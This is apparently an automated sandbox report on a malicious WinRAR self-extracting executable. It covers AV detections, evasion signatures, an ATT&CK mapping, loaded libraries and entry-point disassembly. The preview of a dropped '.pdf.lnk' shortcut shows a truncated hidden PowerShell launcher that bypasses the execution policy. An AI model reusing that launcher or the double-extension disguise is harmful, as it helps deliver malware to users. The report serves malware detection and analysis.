
Windows Analysis Report
MpkkG8XzhJ.exe

Overview

General Information

Sample name:MpkkG8XzhJ.exe
renamed because original name is a hash value
Original sample name:659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd.exe
Analysis ID:1522696
MD5:51570f6e590151159f4761e2fb4ecd60
SHA1:0cbfb5efe558a632fa1de3861c3b87389c987035
SHA256:659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd
Tags: exe, UAC-0099, user-JAMESWT_MHT
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
File is packed with WinRar
Found evasive API chain (date check)
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious LNK Double Extension File Created
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • MpkkG8XzhJ.exe (PID: 4928 cmdline: "C:\Users\user\Desktop\MpkkG8XzhJ.exe" MD5: 51570F6E590151159F4761E2FB4ECD60)
  • cleanup
No configs have been found
No yara matches
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems), frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\MpkkG8XzhJ.exe, ProcessId: 4928, TargetFilename: C:\Users\user\Desktop\????????? ???? ?? ????????? ??? ? 01.01.24.pdf.lnk
No Suricata rule has matched


AV Detection

Source: MpkkG8XzhJ.exe | Avira: detected
Source: MpkkG8XzhJ.exe | ReversingLabs: Detection: 71%
Source: MpkkG8XzhJ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: MpkkG8XzhJ.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpkkG8XzhJ.exe
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000BBA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_000BBA94
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000CD410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_000CD410
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000DC4F8 FindFirstFileExA,0_2_000DC4F8
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000CB080 SetWindowLongW,NtdllDefWindowProc_W,0_2_000CB080
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000B7AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_000B7AAF
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000B92C6 0_2_000B92C6
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000C7DCC 0_2_000C7DCC
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000C5001 0_2_000C5001
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000C8243 0_2_000C8243
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000C5272 0_2_000C5272
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000D6298 0_2_000D6298
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000C02F7 0_2_000C02F7
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000C13F6 0_2_000C13F6
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000C741E 0_2_000C741E
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000D64C7 0_2_000D64C7
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000C55A0 0_2_000C55A0
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000DE5F0 0_2_000DE5F0
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000C07A0 0_2_000C07A0
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000BD833 0_2_000BD833
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000C889F 0_2_000C889F
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000B395A 0_2_000B395A
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000B4A8E 0_2_000B4A8E
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000DEA9E 0_2_000DEA9E
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000E2BA4 0_2_000E2BA4
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000BFCCC 0_2_000BFCCC
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000B2EB6 0_2_000B2EB6
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: String function: 000CFEEC appears 42 times
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: String function: 000D0790 appears 31 times
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: String function: 000CFFC0 appears 56 times
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: MpkkG8XzhJ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal56.winEXE@1/1@0/0
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000B7727 GetLastError,FormatMessageW,0_2_000B7727
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000CB0BE CLSIDFromString,CoCreateInstance,0_2_000CB0BE
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000CB6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_000CB6C2
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_7153640
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Command line argument: sfxname 0_2_000CF04C
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Command line argument: sfxstime 0_2_000CF04C
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Command line argument: STARTDLG 0_2_000CF04C
Source: MpkkG8XzhJ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: MpkkG8XzhJ.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | File read: C:\Users\user\Desktop\MpkkG8XzhJ.exe
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: dataexchange.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: d3d11.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: dcomp.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: dxgi.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: twinapi.appcore.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: msiso.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: mshtml.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: srpapi.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: msimtf.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: d2d1.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: d3d10warp.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: dxcore.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: mlang.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: uiautomationcore.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: MpkkG8XzhJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: MpkkG8XzhJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: MpkkG8XzhJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: MpkkG8XzhJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: MpkkG8XzhJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: MpkkG8XzhJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: MpkkG8XzhJ.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: MpkkG8XzhJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpkkG8XzhJ.exe
Source: MpkkG8XzhJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: MpkkG8XzhJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: MpkkG8XzhJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: MpkkG8XzhJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: MpkkG8XzhJ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_7153640
Source: MpkkG8XzhJ.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000D07E0 push ecx; ret 0_2_000D07F3
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000CFEEC push eax; ret 0_2_000CFF0A
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Memory allocated: 7210000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Evasive API call chain: GetLocalTime,DecisionNodes graph_0-24219
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000BBA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_000BBA94
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000CD410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_000CD410
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000DC4F8 FindFirstFileExA,0_2_000DC4F8
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000CF81F VirtualQuery,GetSystemInfo,0_2_000CF81F
Source: MpkkG8XzhJ.exe, 00000000.00000002.2174563720.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | API call chain: ExitProcess graph end node graph_0-24450
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000D09FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000D09FA
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000D91A0 mov eax, dword ptr fs:[00000030h] 0_2_000D91A0
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000DD1E0 GetProcessHeap,0_2_000DD1E0
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000D09FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000D09FA
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000D0B8D SetUnhandledExceptionFilter,0_2_000D0B8D
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000D0D7A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000D0D7A
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000D4FDF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000D4FDF
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000D0816 cpuid 0_2_000D0816
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_000CC083
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000CF04C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_000CF04C
Source: C:\Users\user\Desktop\MpkkG8XzhJ.exe | Code function: 0_2_000BC365 GetVersionExW,0_2_000BC365
MITRE ATT&CK Matrix (a leading number marks a technique matched by this sample's behaviour):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Virtualization/Sandbox Evasion | LSASS Memory | 21 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 34 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label | Link
MpkkG8XzhJ.exe | 71% | ReversingLabs | Win32.Trojan.Malgent |
MpkkG8XzhJ.exe | 100% | Avira | EXP/LNK.Agent.ofgtz |
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1522696
Start date and time:2024-09-30 15:40:29 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 10s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:MpkkG8XzhJ.exe
renamed because original name is a hash value
Original Sample Name:659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd.exe
Detection:MAL
Classification:mal56.winEXE@1/1@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 120
  • Number of non-executed functions: 95
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: MpkkG8XzhJ.exe
No simulations
No context
Process:C:\Users\user\Desktop\MpkkG8XzhJ.exe
File Type:MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Nov 30 07:52:33 2023, mtime=Thu Nov 30 07:52:33 2023, atime=Thu Nov 30 07:52:33 2023, length=0, window=hide
Category:dropped
Size (bytes):25631
Entropy (8bit):5.972732311180514
Encrypted:false
SSDEEP:768:dPeFfZZEwj8l3fLSjDcljohJ8AtHMDjr4LunAX:dPUX8l2aFA1MDjrPU
MD5:64752D058E5829210A0F407FB912C9D3
SHA1:4E8A0CFB784A6F93F8974B4F11679786CEF86BB7
SHA-256:0AA794E54C19DBCD5425405E3678AB9BC98FB7EA787684AFB962EE22A1C0AB51
SHA-512:A383CFCAF25DABABB76273EC0802867E1E74D2BCF4640EEE855714B4C7C74E61145C6510668327DEE053D904ED9D5CB4C5BFC3A8149F992FFDCB2CC7A96F1904
Malicious:false
Reputation:low
Preview:L..................Fe..........j#.....j#.....j#...............................P.O. .:i.....+00.../C:\.....................2..:..HG.-..windows\system32\WindowsPowershell\v1.0\powershell.exe.........HG.-.KMI....w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.s.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e...F......b-w hidden -nop -noni -exec bypass -c $temp='
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.814308062083348
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:MpkkG8XzhJ.exe
File size:344'623 bytes
MD5:51570f6e590151159f4761e2fb4ecd60
SHA1:0cbfb5efe558a632fa1de3861c3b87389c987035
SHA256:659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd
SHA512:38b767f85887d6f26dac90733f0a0d9e89df3cde2c3d084cab34a6bd7e9a002acd84b0261becd3c5078846e29544b7f7ad4ad96df364c8c9eeba1bd97c9321c5
SSDEEP:6144:ntH/xNLaAOvIBd7lAAxWS1elIoSN6WX+t45qxN7M:ntH5NLaAdDhAAEIFcWX+t4oxNQ
TLSH:7D74B00276C185B2D57328331A35AF20B67D7C301F768EDB9394695EDE321C09A36BA7
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w...w...w..<.V..w..<.T..w..<.U..w....Z..w.......w.......w.......w....$..w....4..w...w...v.......w.......w....X..w.......w.
Icon Hash:1515d4d4442f2d2d
Entrypoint:0x420780
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x6474CCD4 [Mon May 29 16:03:32 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:0ae9e38912ff6bd742a1b9e5c003576a
Instruction
call 00007FD2BCBA2FDBh
jmp 00007FD2BCBA298Dh
int3
int3
int3
int3
int3
int3
push 00423A80h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [004407A8h]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FD2BCB95821h
push 0043D14Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FD2BCBA5635h
int3
jmp 00007FD2BCBA7508h
push ebp
mov ebp, esp
and dword ptr [00463D58h], 00000000h
sub esp, 24h
or dword ptr [004407A0h], 01h
push 0000000Ah
call dword ptr [004341C4h]
test eax, eax
je 00007FD2BCBA2CC2h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
Programming Language:
